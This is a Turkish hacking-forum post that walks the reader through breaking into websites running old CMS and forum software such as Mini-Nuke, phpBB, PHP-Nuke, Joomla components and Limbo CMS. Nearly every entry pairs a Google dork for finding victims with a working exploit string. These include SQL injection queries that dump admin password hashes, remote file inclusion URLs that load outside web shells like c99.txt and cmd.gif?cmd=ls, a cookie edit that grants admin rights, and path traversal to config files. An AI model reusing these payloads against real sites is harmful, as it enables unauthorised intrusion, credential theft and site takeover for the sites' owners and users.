Bazı Sitelerdeki Var olan Acıklar

[KASRGA]

MİNİ NUKE V2.3



Mini nuke sitelerle uğraşmak için ilk önce



wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.



Karşımıza gelen sitelerin sonuna



:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1



Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.



MD5 i kırmak içinde



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



CİGİCİGİ&GPLX

---------------------------------------------------------------------------



-VİRTUAL WAR V.1.0



ilk önce [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ’Powered by: Virtual War v1.5.0’



Sonu /war.php olan siteleri seçiyoruz ve



war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.



Artık admin palenelindeyiz



[Eski bir açık olduğu için sonuç alamayabilirsiniz]





---------------------------------------------------------------------------

---

-PHPBB 2.0.11



işte meşhur phpbb açığı



Bize gereken en önemli program :



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] [Cooike Editör]



Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.



Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından



kurban phpbb 2.0.11 sitemizi seçicez.



Sitemizi bulduk 2 kez tıklıyoruz.



Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik



Kubidik Kodlar Gelicek Üssteki Kodu Slip



a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz



Saveliyoruz.



Artık cooike editör ile işimiz bitti



Sitemizi yeniliyoruz bakıyoruz aaaa adminiz





---------------------------------------------------------------------------

-----

-PHP NUKE SQL INJECTİON



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] a giriyoruz aranacak kelimeye



’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.



Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi



Search bölümünü bulamadıysanız



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.





---------------------------------------------------------------------------

------

-COM_REMOSİTORY



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ’’inurl:"com_remository"



Bulduğumuz sitelere



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php



Kodunu ekliyoruz...



---------------------------------------------------------------------------

-----------

-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ’inurl:modules/myAds/’



Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...



---------------------------------------------------------------------------

-------------

-TOPLİST HACK PHPBB



GoogLe Arama : inurl:"toplist.php" "powered by phpbb"





Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls





---------------------------------------------------------------------------

--------------

- PC_COOKBOOK JOOMLA COMPONENT



- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities



- Author: JaheeMCreW



- Uygulama : pc_cookbook Component



- Version : koyans 0.3



Yapmaniz gereken bir arama moturunda örnek google’ da



" allinurl:com_pccookbook " olarak aratmaktir..



Exploit :



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][path]/compo...osConfig_absol ute_path=http://evilscript





---------------------------------------------------------------------------

-------------

-SİMPLE BOARD MAMBO



İlk Önce WwwW.GoogLe.com



Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]





---------------------------------------------------------------------------

-------------

-ShoutBox IncLusion



shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...



Code:



/shoutbox/expanded.php?conf=





GoogLe Arama : inurl:"/shoutbox/expanded.php?"



---------------------------------------------------------------------------

--------------

-PHPBAZAR <= 2.1.0 Remote File INCLLUSION



Google Search=inurl:classified.php phpbazar



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]





---------------------------------------------------------------------------

---------------

-BoastMachine [bmachine]



yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :



site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin



şifresini görüyoruz : )





---------------------------------------------------------------------------

----------------

-Limbo CMS <= 1.04 Remote File Inclusion



GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"





Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

---------------------------------------------------------------------------

-----------------

-CaLogic Calendars V1.2.2 - Remote File Include



GoogLe Arama : CaLogic Calendars V1.2.2



kullanmak için :



[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][path]/reconfig....1;evil_script]

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...][path]/srxclr.ph...1;evil_script]





---------------------------------------------------------------------------

------------------

-PafileDB Remote File Inclusion [phpBB]



PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..





http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]





---------------------------------------------------------------------------

-------------------

-JetBox CMS Remote File Include [ RFI ]



Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..



Uretici Firma : http://jetbox.streamedge.com/



JetBox CMS Remote File Include



http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..




Aratma Kodu : PHP Upload Center v2.0

Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?